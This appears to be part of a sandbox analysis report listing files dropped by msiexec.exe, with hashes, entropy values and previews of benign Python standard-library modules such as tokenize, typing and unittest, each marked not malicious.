                                                                                                                                Preview:"""Token constants."""..# Auto-generated by Tools/scripts/generate_token.py....__all__ = ['tok_name', 'ISTERMINAL', 'ISNONTERMINAL', 'ISEOF']....ENDMARKER = 0..NAME = 1..NUMBER = 2..STRING = 3..NEWLINE = 4..INDENT = 5..DEDENT = 6..LPAR = 7..RPAR = 8..LSQB = 9..RSQB = 10..COLON = 11..COMMA = 12..SEMI = 13..PLUS = 14..MINUS = 15..STAR = 16..SLASH = 17..VBAR = 18..AMPER = 19..LESS = 20..GREATER = 21..EQUAL = 22..DOT = 23..PERCENT = 24..LBRACE = 25..RBRACE = 26..EQEQUAL = 27..NOTEQUAL = 28..LESSEQUAL = 29..GREATEREQUAL = 30..TILDE = 31..CIRCUMFLEX = 32..LEFTSHIFT = 33..RIGHTSHIFT = 34..DOUBLESTAR = 35..PLUSEQUAL = 36..MINEQUAL = 37..STAREQUAL = 38..SLASHEQUAL = 39..PERCENTEQUAL = 40..AMPEREQUAL = 41..VBAREQUAL = 42..CIRCUMFLEXEQUAL = 43..LEFTSHIFTEQUAL = 44..RIGHTSHIFTEQUAL = 45..DOUBLESTAREQUAL = 46..DOUBLESLASH = 47..DOUBLESLASHEQUAL = 48..AT = 49..ATEQUAL = 50..RARROW = 51..ELLIPSIS = 52..COLONEQUAL = 53..OP = 54..AWAIT = 55..ASYNC = 56..TYPE_IGNORE = 57..TYPE_COMMENT = 58..SOFT_KEYWORD
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):27030
                                                                                                                                Entropy (8bit):4.485196742861273
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:gk38juhVciXCBRFY0VbUu/qqY2RGwrHfxGN8vlyk8fkRc:g8hVciXuRF2BSGwrHINglykPRc
                                                                                                                                MD5:816026F1F491E2025C586AC805FB7F81
                                                                                                                                SHA1:C0EE31770CB49C655D739794485ECE1F21B8D552
                                                                                                                                SHA-256:7C723DB5C8F22BF930658BC89B2FAB77F2D5702F3FEFC116597F23051D028B7E
                                                                                                                                SHA-512:6E5848FF079B2AE43C8868A1C2E68D0FB55F2A58683883CE824A2F544EDE89EE12ECDCD6875A42C7C24F948C60BE785447E12CB2FEBF8A5B031342A9A395BB93
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""Tokenization help for Python programs.....tokenize(readline) is a generator that breaks a stream of bytes into..Python tokens. It decodes the bytes according to PEP-0263 for..determining source file encoding.....It accepts a readline-like method which is called repeatedly to get the..next line of input (or b"" for EOF). It generates 5-tuples with these..members:.... the token type (see token.py).. the token (a string).. the starting (row, column) indices of the token (a 2-tuple of ints).. the ending (row, column) indices of the token (a 2-tuple of ints).. the original line (string)....It is designed to match the working of the Python tokenizer exactly, except..that it produces COMMENT tokens for comments and gives type OP for all..operators. Additionally, all token lists start with an ENCODING token..which tells you which encoding was used to decode the bytes stream..."""....__author__ = 'Ka-Ping Yee <ping@lfw.org>'..__credits__ = ('GvR, ESR, Tim Peters, Thomas Wou
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):318
                                                                                                                                Entropy (8bit):5.045051054683137
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6:SAgLRatxZSE91SnWiRD65orBUL2/fDwMwfXfv7zAn:5O+xZSE91SnWiRD65UUi/Lj+Xfj0n
                                                                                                                                MD5:F7972D06CBEBD7D5618C4D56BB8E471F
                                                                                                                                SHA1:BD39C6D364257C64AD3DA9017DE44D7A3A2CA5F1
                                                                                                                                SHA-256:340E8AE1914E9E9E83E354BF9BCD2E96C4A4EBBC5CBDDAA4AE90037671D48CB9
                                                                                                                                SHA-512:A3578FDD7426C8E72665621584D2BD242BF8AB1B0A88D93E5F6FE6A28E13A7AE4B1BE48A1E8B5E0A019276D2F9D95EC23E4EFA587BA52802B05835C04FC6261E
                                                                                                                                Malicious:false
                                                                                                                                Preview:# SPDX-License-Identifier: MIT..# SPDX-FileCopyrightText: 2021 Taneli Hukkinen..# Licensed to PSF under a Contributor Agreement.....__all__ = ("loads", "load", "TOMLDecodeError")....from ._parser import TOMLDecodeError, load, loads....# Pretend this exception was created here...TOMLDecodeError.__module__ = __name__..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):23322
                                                                                                                                Entropy (8bit):4.727730663363257
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:/ZipBhaO0DKo/Fa7P2ynswBfboTBtqJbb6lNTPMQ9C2XAHzi1DV/ezwW:/UpBh90DKoA7+rTPcb67T0QbXEe1DV/a
                                                                                                                                MD5:692ECDB85BAABC115BB8ACDD82B0CDE2
                                                                                                                                SHA1:4B5EDFAB3FCE7ED3517F3753AA7D0B2E9076146D
                                                                                                                                SHA-256:3D50B4129E51B82DC56104B75533B71216A85F681750F21C59290A97D0811086
                                                                                                                                SHA-512:5FD1FE6ABFB331299C787457CB3D8F8EFA6880D3AE99ADF574167E11EEDC2342C2ADFA1561F75EE21809BEA8645CA9309F01FD6FE82FE1863F66A20FFADB23C3
                                                                                                                                Malicious:false
                                                                                                                                Preview:# SPDX-License-Identifier: MIT..# SPDX-FileCopyrightText: 2021 Taneli Hukkinen..# Licensed to PSF under a Contributor Agreement.....from __future__ import annotations....from collections.abc import Iterable..import string..from types import MappingProxyType..from typing import Any, BinaryIO, NamedTuple....from ._re import (.. RE_DATETIME,.. RE_LOCALTIME,.. RE_NUMBER,.. match_to_datetime,.. match_to_localtime,.. match_to_number,..)..from ._types import Key, ParseFloat, Pos....ASCII_CTRL = frozenset(chr(i) for i in range(32)) | frozenset(chr(127))....# Neither of these sets include quotation mark or backslash. They are..# currently handled as separate cases in the parser functions...ILLEGAL_BASIC_STR_CHARS = ASCII_CTRL - frozenset("\t")..ILLEGAL_MULTILINE_BASIC_STR_CHARS = ASCII_CTRL - frozenset("\t\n")....ILLEGAL_LITERAL_STR_CHARS = ILLEGAL_BASIC_STR_CHARS..ILLEGAL_MULTILINE_LITERAL_STR_CHARS = ILLEGAL_MULTILINE_BASIC_STR_CHARS....ILLEGAL_COMMENT_CHARS = ILLEGAL_BASIC_
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):3050
                                                                                                                                Entropy (8bit):5.020525008551756
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:8iRjeF1UmPPZIVDGiesR8/siAHIIUeTcPalZx2D0lHtGo0Do7Gq5PnLknQyszIEH:tZ2pZIVDGiesRuNMIIT6DOMsnwQysEU
                                                                                                                                MD5:CB6C73383CC9DC1F343BB05E404FF4E5
                                                                                                                                SHA1:30061B4A315B8EBEFAB207B084E6BC8534A693B5
                                                                                                                                SHA-256:4842E6E992D2D9FFB07B47BE52C62A016582305E7071C2748877ED60A51D13A6
                                                                                                                                SHA-512:4ECE79CDE22FE3AD3A18F34438181288C5B7B6055030F475346E86B809F5ED79BB22FD7D89E73AC9DEC66099EA5B79B6D199FF0E68E183AA7548D08C8B47CEF3
                                                                                                                                Malicious:false
                                                                                                                                Preview:# SPDX-License-Identifier: MIT..# SPDX-FileCopyrightText: 2021 Taneli Hukkinen..# Licensed to PSF under a Contributor Agreement.....from __future__ import annotations....from datetime import date, datetime, time, timedelta, timezone, tzinfo..from functools import lru_cache..import re..from typing import Any....from ._types import ParseFloat....# E.g...# - 00:32:00.999999..# - 00:32:00.._TIME_RE_STR = r"([01][0-9]|2[0-3]):([0-5][0-9]):([0-5][0-9])(?:\.([0-9]{1,6})[0-9]*)?"....RE_NUMBER = re.compile(.. r"""..0..(?:.. x[0-9A-Fa-f](?:_?[0-9A-Fa-f])* # hex.. |.. b[01](?:_?[01])* # bin.. |.. o[0-7](?:_?[0-7])* # oct..)..|..[+-]?(?:0|[1-9](?:_?[0-9])*) # dec, integer part..(?P<floatpart>.. (?:\.[0-9](?:_?[0-9])*)? # optional fractional part.. (?:[eE][+-]?[0-9](?:_?[0-9])*)? # optional exponent part..)..""",.. flags=re.VERBOSE,..)..RE_LOCALTIME = re.compile(_TIME_RE_STR)..RE_DATETIME = re.compile(.. rf"""..([0-9]{{4
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):264
                                                                                                                                Entropy (8bit):5.020749606814896
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6:SAgLRatxZSE91SnWNREYBFpkkVBL+RBCw+5/Lin:5O+xZSE91SnWNREYBJVB4c/Li
                                                                                                                                MD5:DE6BA739621EA2A492AFFF15C82377F9
                                                                                                                                SHA1:58DC9831FC2BBB71850D3F35B93D30C2EB9693B8
                                                                                                                                SHA-256:FF8F42662B5B3275150639B2C20F72C08D1DD27E9F3C646B968C5A67B86BE9FE
                                                                                                                                SHA-512:5B326E4D83B536728AF4656885B0131F1E368B90B05914E7AF7B7F38DA78C5249A88D83D11473C10F8F71FB7E49CC9332DCB91F825F033958F3DFF0A3C0145DF
                                                                                                                                Malicious:false
                                                                                                                                Preview:# SPDX-License-Identifier: MIT..# SPDX-FileCopyrightText: 2021 Taneli Hukkinen..# Licensed to PSF under a Contributor Agreement.....from typing import Any, Callable, Tuple....# Type annotations..ParseFloat = Callable[[str], Any]..Key = Tuple[str, ...]..Pos = int..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):29935
                                                                                                                                Entropy (8bit):4.347337151590087
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:768:s8ANL0a9ZzFPGmpE+y0161HRlT9Lx+Mdbud3:biL0aJFp5yVtfud3
                                                                                                                                MD5:BB2B2BC41DE7DCF42C3D7DFDB0CC0205
                                                                                                                                SHA1:D5A4DCC4B44961E60012C6DB923FC3E63D670B15
                                                                                                                                SHA-256:5B8FB11043B5EA2179B1F00303E4918DA52872620AA77393A4C5C5389EC564DD
                                                                                                                                SHA-512:ED2AD13C98AED29F309805F720B38288A0CDF5555A9431416617CCB81016BF53CDCE58CCFCE25A6477ED5CFF0B89733B8D6EBD5870D780F2320CAE9B283093C8
                                                                                                                                Malicious:false
                                                                                                                                Preview:#!/usr/bin/env python3....# portions copyright 2001, Autonomous Zones Industries, Inc., all rights.....# err... reserved and offered to the public under the terms of the..# Python 2.2 license...# Author: Zooko O'Whielacronx..# http://zooko.com/..# mailto:zooko@zooko.com..#..# Copyright 2000, Mojam Media, Inc., all rights reserved...# Author: Skip Montanaro..#..# Copyright 1999, Bioreason, Inc., all rights reserved...# Author: Andrew Dalke..#..# Copyright 1995-1997, Automatrix, Inc., all rights reserved...# Author: Skip Montanaro..#..# Copyright 1991-1995, Stichting Mathematisch Centrum, all rights reserved...#..#..# Permission to use, copy, modify, and distribute this Python software and..# its associated documentation for any purpose without fee is hereby..# granted, provided that the above copyright notice appears in all copies,..# and that both that copyright notice and this permission notice appear in..# supporting documentation, and that the name of neither Automatrix,..# Bioreas
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):39034
                                                                                                                                Entropy (8bit):4.364981095274673
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:EM34PJRGC0dIx2hdjOOkCnL8rEn6CI+ZZjHODJAIcxApgIUm8XWNRCkcAiZMnHJJ:EMohcpIx2x9fZZDtWUm9R95ianHJak9
                                                                                                                                MD5:CE541FEECEA5D5E8FE4B346FCABACFB7
                                                                                                                                SHA1:04AD5E28E9324C0A3FB3E651187EAF4A2E7B39E3
                                                                                                                                SHA-256:1B5D3059606630FA04E83A18C65B216C5DF01C0942C19AC761AC6F7B2942483E
                                                                                                                                SHA-512:01B0E52D7CE244447C34DBCB11786DFCA06AE41C9CF547B98FB035525B50784E006E3FC1C6A5406C94A292F1B38D10D8EC03377F2B374AC0C68E9936D6A99D1F
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""Extract, format and print information about Python stack traces."""....import collections.abc..import itertools..import linecache..import sys..import textwrap..from contextlib import suppress....__all__ = ['extract_stack', 'extract_tb', 'format_exception',.. 'format_exception_only', 'format_list', 'format_stack',.. 'format_tb', 'print_exc', 'format_exc', 'print_exception',.. 'print_last', 'print_stack', 'print_tb', 'clear_frames',.. 'FrameSummary', 'StackSummary', 'TracebackException',.. 'walk_stack', 'walk_tb']....#..# Formatting and printing lists of traceback lines...#....def print_list(extracted_list, file=None):.. """Print the list of tuples as returned by extract_tb() or.. extract_stack() as a formatted stack trace to the given file.""".. if file is None:.. file = sys.stderr.. for item in StackSummary.from_list(extracted_list).format():.. print(item, file=file, end="")....def format_list(extracted_list
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):18607
                                                                                                                                Entropy (8bit):4.3022125555964355
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:+4LhpNVbPdoUFsyIygyWy98JYYV/lGT7mEE/U/JZJtvryt/+ZYJOZGB5qTW:VhbVbPbFhFdWy98JYYVNGXLjGT
                                                                                                                                MD5:0233BC515180C861D919BA79B6928163
                                                                                                                                SHA1:FD671280B0ECDD6E8EB44F36C75ADE6E5C32DE8F
                                                                                                                                SHA-256:488C28AD5FD084DD715986EA235928894F1B140AC880A5872655A99C97054DC2
                                                                                                                                SHA-512:6B158318BF6BBCE099EC3519E5A2780504ADBB93B76F33FA19DE57BCA808757A466731D2D7C47EBCA29B492AE66685908449B811A02DA1BD62FE1F6D95B0A7A5
                                                                                                                                Malicious:false
                                                                                                                                Preview:from collections.abc import Sequence, Iterable..from functools import total_ordering..import fnmatch..import linecache..import os.path..import pickle....# Import types and functions implemented in C..from _tracemalloc import *..from _tracemalloc import _get_object_traceback, _get_traces......def _format_size(size, sign):.. for unit in ('B', 'KiB', 'MiB', 'GiB', 'TiB'):.. if abs(size) < 100 and unit != 'B':.. # 3 digits (xx.x UNIT).. if sign:.. return "%+.1f %s" % (size, unit).. else:.. return "%.1f %s" % (size, unit).. if abs(size) < 10 * 1024 or unit == 'TiB':.. # 4 or 5 digits (xxxx UNIT).. if sign:.. return "%+.0f %s" % (size, unit).. else:.. return "%.0f %s" % (size, unit).. size /= 1024......class Statistic:.. """.. Statistic difference on memory allocations between two Snapshot instance... """.... __slots__ = ('traceback
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):915
                                                                                                                                Entropy (8bit):5.155261600153728
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:NTExRunRoMsDJ3DTFBNUtzlZhFR7nrCVRTLSgDmOSad5hsh3G9FX9bI0ARdCVRTt:NT0SWBgTFRXC7TBLSavr/9UpC7TVlI9u
                                                                                                                                MD5:766278735444B810C8C42470582F1A83
                                                                                                                                SHA1:0137F3643374A75BC4F60CE34668BEA5C299C921
                                                                                                                                SHA-256:45805F726BF977290DFAC21AEAC1E506E7759804BF9D01DB5DCF7D17337AEA30
                                                                                                                                SHA-512:FD1EE04ED1AED4097E96A15A902398790447DB311577E8B8ECA86752D353A2699D6C9101C4D5DDF846DBFC3144B8B51CAC0016C1C84827AE7A0B30E9E88F7AC4
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""Terminal utilities."""....# Author: Steen Lumholt.....from termios import *....__all__ = ["setraw", "setcbreak"]....# Indexes for termios list...IFLAG = 0..OFLAG = 1..CFLAG = 2..LFLAG = 3..ISPEED = 4..OSPEED = 5..CC = 6....def setraw(fd, when=TCSAFLUSH):.. """Put terminal into a raw mode.""".. mode = tcgetattr(fd).. mode[IFLAG] = mode[IFLAG] & ~(BRKINT | ICRNL | INPCK | ISTRIP | IXON).. mode[OFLAG] = mode[OFLAG] & ~(OPOST).. mode[CFLAG] = mode[CFLAG] & ~(CSIZE | PARENB).. mode[CFLAG] = mode[CFLAG] | CS8.. mode[LFLAG] = mode[LFLAG] & ~(ECHO | ICANON | IEXTEN | ISIG).. mode[CC][VMIN] = 1.. mode[CC][VTIME] = 0.. tcsetattr(fd, when, mode)....def setcbreak(fd, when=TCSAFLUSH):.. """Put terminal into a cbreak mode.""".. mode = tcgetattr(fd).. mode[LFLAG] = mode[LFLAG] & ~(ECHO | ICANON).. mode[CC][VMIN] = 1.. mode[CC][VTIME] = 0.. tcsetattr(fd, when, mode)..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF, CR line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):148517
                                                                                                                                Entropy (8bit):4.482317067770443
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3072:RhU5qJ9zvUWb+m2lrOprf5Aibivx4fi1gSCmVX/7:xZdb92lrOprf5ax4fi1gNmVX/7
                                                                                                                                MD5:9965D74CE2FEE9FDDB587CEDC2EDA23E
                                                                                                                                SHA1:9A74D58B7E2F0516B1C5910D5D44021D7D2B1B20
                                                                                                                                SHA-256:581C4A84285A07CB5F2DCA3E7D91A1214A64187C19809FCABFC32AEBD4B1DCD5
                                                                                                                                SHA-512:80B1DA7690597317DE9179518F485D7C9B185231ACC209626267F6F8E06E8344DD6771B4BED449D4A1B79A837E7A7AB7CEC41A685FFBD571490C9FD0ED5135B8
                                                                                                                                Malicious:false
                                                                                                                                Preview:#..# turtle.py: a Tkinter based turtle graphics module for Python..# Version 1.1b - 4. 5. 2009..#..# Copyright (C) 2006 - 2010 Gregor Lingl..# email: glingl@aon.at..#..# This software is provided 'as-is', without any express or implied..# warranty. In no event will the authors be held liable for any damages..# arising from the use of this software...#..# Permission is granted to anyone to use this software for any purpose,..# including commercial applications, and to alter it and redistribute it..# freely, subject to the following restrictions:..#..# 1. The origin of this software must not be misrepresented; you must not..# claim that you wrote the original software. If you use this software..# in a product, an acknowledgment in the product documentation would be..# appreciated but is not required...# 2. Altered source versions must be plainly marked as such, and must not be..# misrepresented as being the original software...# 3. This notice may not be removed or altered
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):10372
                                                                                                                                Entropy (8bit):4.6238528786906645
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:RYevVSyv8c+zNVWPfeSu6r/OKi+VfTQJWDswfAE9UYzaSaVDYG1XVz6:RYuLv89zHWPm3l4faWIwLaVDZ1XV+
                                                                                                                                MD5:A226432E4C8E57487655ABFD4B840665
                                                                                                                                SHA1:CC4DB73107EE715332CEFA79B0B6EE64D9BE10DB
                                                                                                                                SHA-256:C762D2321A143AA9A7EAEB30F8ED8042C10A3E98E4FA678E4F659E2136BF85B5
                                                                                                                                SHA-512:26B0D6B9BFDA2F8F88200123EECDBFBBA39203D65620997AC93630F4614FF8665D372DD1A6A4889FC34D932831AE88ACA486569C47BDA066E3B8A2C0EDEFDD6D
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""..Define names for built-in types that aren't directly accessible as a builtin..."""..import sys....# Iterators in Python aren't a matter of type but of protocol. A large..# and changing number of builtin types implement *some* flavor of..# iterator. Don't check the type! Use hasattr to check for both..# "__iter__" and "__next__" attributes instead.....def _f(): pass..FunctionType = type(_f)..LambdaType = type(lambda: None) # Same as FunctionType..CodeType = type(_f.__code__)..MappingProxyType = type(type.__dict__)..SimpleNamespace = type(sys.implementation)....def _cell_factory():.. a = 1.. def f():.. nonlocal a.. return f.__closure__[0]..CellType = type(_cell_factory())....def _g():.. yield 1..GeneratorType = type(_g())....async def _c(): pass.._c = _c()..CoroutineType = type(_c).._c.close() # Prevent ResourceWarning....async def _ag():.. yield.._ag = _ag()..AsyncGeneratorType = type(_ag)....class _C:.. def _m(self): pass..MethodType = type(_C(
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):120899
                                                                                                                                Entropy (8bit):4.611392441340608
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3072:UShaPYRZFtmmjdsRkrclEbuMgN3UCHaGWdcXaI4AogZnNT:J4gRZFRsRkYlEbuf3QGWyN4AogrT
                                                                                                                                MD5:CDD7D64F7A0D93CCAD75273F288C3A37
                                                                                                                                SHA1:38A1F93F36343AD9D5C37BDAB3147BC4522A09DA
                                                                                                                                SHA-256:C5228C8674E55214F6F67BFA4C9662E4ACF7A93D5B5A662BE1A72F56D8B90ABF
                                                                                                                                SHA-512:8115089636CEC27D0F9756FB4C33EAA03B27E4C50046CC4ADC13D5E6CE2FB626D4F773F7315B93FAB7E0378079FC961FEAAC33DB65588209794C0FFE6C81348E
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""..The typing module: Support for gradual typing as defined by PEP 484.....At large scale, the structure of the module is following:..* Imports and exports, all public names should be explicitly added to __all__...* Internal helper functions: these should never be used in code outside this module...* _SpecialForm and its instances (special forms):.. Any, NoReturn, Never, ClassVar, Union, Optional, Concatenate, Unpack..* Classes whose instances can be type arguments in addition to types:.. ForwardRef, TypeVar and ParamSpec..* The core of internal generics API: _GenericAlias and _VariadicGenericAlias, the latter is.. currently only used by Tuple and Callable. All subscripted types like X[int], Union[int, str],.. etc., are instances of either of these classes...* The public counterpart of the generics API consists of two classes: Generic and Protocol...* Public helper functions: get_type_hints, overload, cast, no_type_check,.. no_type_check_decorator...* Generic aliases for collect
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):4032
                                                                                                                                Entropy (8bit):5.107416899715009
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:gFtnZewzoX2FQCL3st/B+9CadmvrIH4gV771gy+TUCvw:ktngwzgtCL3stS91TaK
                                                                                                                                MD5:CC6D44F1BB84B0EE97989B07AD1CDFC2
                                                                                                                                SHA1:CF60CAF325853901E0ADE0289BCC31977C19551A
                                                                                                                                SHA-256:9C63C3B705180F607FAA79EC59C9E0EE1829219AF09660CF08B1C188603123B0
                                                                                                                                SHA-512:7B95ED2F314C149F67DD966483A45F636F3BD42F9E465531E72DF418060E648A19788908211C482DB40B5F8073C63D35000E01CBC994B13F2FFE521F90D5C67C
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""..Python unit testing framework, based on Erich Gamma's JUnit and Kent Beck's..Smalltalk testing framework (used with permission).....This module contains the core framework classes that form the basis of..specific test cases and suites (TestCase, TestSuite etc.), and also a..text-based utility class for running the tests and reporting the results.. (TextTestRunner).....Simple usage:.... import unittest.... class IntegerArithmeticTestCase(unittest.TestCase):.. def testAdd(self): # test method names begin with 'test'.. self.assertEqual((1 + 2), 3).. self.assertEqual(0 + 1, 1).. def testMultiply(self):.. self.assertEqual((0 * 10), 0).. self.assertEqual((5 * 8), 40).... if __name__ == '__main__':.. unittest.main()....Further information is available in the bundled documentation, and from.... http://docs.python.org/library/unittest.html....Copyright (c) 1999-2003 Steve Purcell..Copyright (c) 2003-2010 Python Sof
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):490
                                                                                                                                Entropy (8bit):4.722470328048522
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:6oSweg/eZTOmqjfj8XLySIVN7rZ0n/c+WuFnXhkU8fRo:6oSi/jfgXlIVN7F8+Knxklo
                                                                                                                                MD5:61F3216563575B97702D3AA2D8BC22C3
                                                                                                                                SHA1:AAFC4D215EB6FF57184AC694F7C6C9463665893E
                                                                                                                                SHA-256:14C0C71B35519473106EA65B3F22A9128F1C4B87D98AAFF0A7B7B770FF2780DD
                                                                                                                                SHA-512:A61341E84CF28659CF9B544DE8EDD68FBF79375D7538800524B3E5A1D95BAC3B6BE3A28602F959730B7FFD08D8134E38CE4553C781C5A2A90F230BE0C781A101
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""Main entry point"""....import sys..if sys.argv[0].endswith("__main__.py"):.. import os.path.. # We change sys.argv[0] to make help message more useful.. # use executable without path, unquoted.. # (it's just a hint anyway).. # (if you have spaces in your executable you get what you deserve!).. executable = os.path.basename(sys.executable).. sys.argv[0] = executable + " -m unittest".. del os....__unittest = True....from .main import main....main(module=None)..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2832
                                                                                                                                Entropy (8bit):4.359518104013746
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:63deMAzExePnhAb6tX4pTAdOv//fmK7f6/4:63debceenS/4
                                                                                                                                MD5:6C5137D84F81114007547C4D84A4C69E
                                                                                                                                SHA1:B1CA1532C89F9A0940813D06B9408D08326E05B3
                                                                                                                                SHA-256:7C9BF421EC62FBB42C9EAA95C24B5E93F64ABB46C5487900BE40300762A4AD3A
                                                                                                                                SHA-512:D0AAA38E37070543C7505D53F5D6A1AC58333FC55FB8E9CD5A2E46D3B3315EC532159B35D4413D1D87CB553FEEC08B06E5DB0692658D3AD73DF244F0FCEA0105
                                                                                                                                Malicious:false
                                                                                                                                Preview:import logging..import collections....from .case import _BaseTestCaseContext......_LoggingWatcher = collections.namedtuple("_LoggingWatcher",.. ["records", "output"])....class _CapturingHandler(logging.Handler):.. """.. A logging handler capturing all (raw and formatted) logging output... """.... def __init__(self):.. logging.Handler.__init__(self).. self.watcher = _LoggingWatcher([], []).... def flush(self):.. pass.... def emit(self, record):.. self.watcher.records.append(record).. msg = self.format(record).. self.watcher.output.append(msg)......class _AssertLogsContext(_BaseTestCaseContext):.. """A context manager for assertLogs() and assertNoLogs() """.... LOGGING_FORMAT = "%(levelname)s:%(name)s:%(message)s".... def __init__(self, test_case, logger_name, level, no_logs):.. _BaseTestCaseContext.__init__(self, test_case).. self.logger_name = logger_name..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):5596
                                                                                                                                Entropy (8bit):4.496915227952415
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:knFDQUjB+uTGt8w8i//57v8DuOQfcQEi9qsYrQbaOGiRJsEGSd4+00:kRQeUuTGN8sNsunnSHiReEGSd410
                                                                                                                                MD5:4AD1E0FEFC18C4AF128AC0EE23BB2F95
                                                                                                                                SHA1:1F4A3A26ED4FB505E0ABF06C641E61A7F748D023
                                                                                                                                SHA-256:5C18E0381A1036C2CBD66AEC8D0AEE271FB49487E073E5F9BB3DEB5E1990A14D
                                                                                                                                SHA-512:20DD1A8218B74F5A8B3CC243691F518C2AD8419B6D99111F2486C6757A8AE17F90DC5BD865771B933BF0F818994CB6E8E5892AA5C9328CCC8396F9004DB12860
                                                                                                                                Malicious:false
                                                                                                                                Preview:import asyncio..import contextvars..import inspect..import warnings....from .case import TestCase......class IsolatedAsyncioTestCase(TestCase):.. # Names intentionally have a long prefix.. # to reduce a chance of clashing with user-defined attributes.. # from inherited test case.. #.. # The class doesn't call loop.run_until_complete(self.setUp()) and family.. # but uses a different approach:.. # 1. create a long-running task that reads self.setUp().. # awaitable from queue along with a future.. # 2. await the awaitable object passing in and set the result.. # into the future object.. # 3. Outer code puts the awaitable and the future object into a queue.. # with waiting for the future.. # The trick is necessary because every run_until_complete() call.. # creates a new task with embedded ContextVar context... # To share contextvars between setUp(), test and tearDown() we need to execute.. # them inside the same task..... # Note:
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):59853
                                                                                                                                Entropy (8bit):4.382246747040763
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:768:iwO1J1e4uBslw2vdMOlrbNRIO+reKucsYlidQgxiqdvgju5VA8bziCFxON:iwg1nNRIeTYlidQgxigVA8b7xs
                                                                                                                                MD5:815DE56B8A10D922521922B8A5A2AAB7
                                                                                                                                SHA1:56AEA5DC640A7571D99CEFD4E146CB1A7C87848E
                                                                                                                                SHA-256:0DB0664B608C5BB36ABB9A16634FBEE606B8A2EF81D324BD795D0E284BE4BF6C
                                                                                                                                SHA-512:25BA9F5804FFB70B082BDE776DED1C6D57A6712D0AA1297EE496EFE23D874770187FA995EF3808DC626A3700DE8C5325CA102CB306D21F6E05C17B3A015D0CF3
                                                                                                                                Malicious:false
